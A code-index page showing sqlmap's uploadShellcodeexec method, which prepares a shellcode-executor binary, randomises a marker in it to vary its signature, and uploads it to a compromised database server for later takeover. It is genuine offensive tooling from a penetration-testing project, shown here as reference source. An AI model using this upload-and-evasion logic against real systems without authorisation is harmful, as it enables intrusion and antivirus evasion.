MCPcopy Index your code
hub / github.com/sqlmapproject/sqlmap / uploadShellcodeexec

Method uploadShellcodeexec

lib/takeover/metasploit.py:621–659  ·  view source on GitHub ↗
(self, web=False)

Source from the content-addressed store, hash-verified

619 os.unlink(self._shellcodeFilePath)
620
621 def uploadShellcodeexec(self, web=False):
622 self.shellcodeexecLocal = os.path.join(paths.SQLMAP_EXTRAS_PATH, "shellcodeexec")
623
624 if Backend.isOs(OS.WINDOWS):
625 self.shellcodeexecLocal = os.path.join(self.shellcodeexecLocal, "windows", "shellcodeexec.x%s.exe_" % "32")
626 content = decloak(self.shellcodeexecLocal)
627 if SHELLCODEEXEC_RANDOM_STRING_MARKER in content:
628 content = content.replace(SHELLCODEEXEC_RANDOM_STRING_MARKER, getBytes(randomStr(len(SHELLCODEEXEC_RANDOM_STRING_MARKER))))
629 _ = cloak(data=content)
630 handle, self.shellcodeexecLocal = tempfile.mkstemp(suffix="%s.exe_" % "32")
631 os.close(handle)
632 with open(self.shellcodeexecLocal, "w+b") as f:
633 f.write(_)
634 else:
635 self.shellcodeexecLocal = os.path.join(self.shellcodeexecLocal, "linux", "shellcodeexec.x%s_" % Backend.getArch())
636
637 __basename = "tmpse%s%s" % (self._randStr, ".exe" if Backend.isOs(OS.WINDOWS) else "")
638
639 self.shellcodeexecRemote = "%s/%s" % (conf.tmpPath, __basename)
640 self.shellcodeexecRemote = ntToPosixSlashes(normalizePath(self.shellcodeexecRemote))
641
642 logger.info("uploading shellcodeexec to '%s'" % self.shellcodeexecRemote)
643
644 if web:
645 written = self.webUpload(self.shellcodeexecRemote, os.path.split(self.shellcodeexecRemote)[0], filepath=self.shellcodeexecLocal)
646 else:
647 written = self.writeFile(self.shellcodeexecLocal, self.shellcodeexecRemote, "binary", forceCheck=True)
648
649 if written is not True:
650 errMsg = "there has been a problem uploading shellcodeexec. It "
651 errMsg += "looks like the binary file has not been written "
652 errMsg += "on the database underlying file system or an AV has "
653 errMsg += "flagged it as malicious and removed it"
654 logger.error(errMsg)
655
656 return False
657 else:
658 logger.info("shellcodeexec successfully uploaded")
659 return True
660
661 def pwn(self, goUdf=False):
662 if goUdf:

Callers 1

osPwnMethod · 0.80

Calls 15

decloakFunction · 0.90
getBytesFunction · 0.90
randomStrFunction · 0.90
cloakFunction · 0.90
ntToPosixSlashesFunction · 0.90
normalizePathFunction · 0.90
isOsMethod · 0.80
getArchMethod · 0.80
infoMethod · 0.80
webUploadMethod · 0.80
replaceMethod · 0.45
closeMethod · 0.45

Tested by

no test coverage detected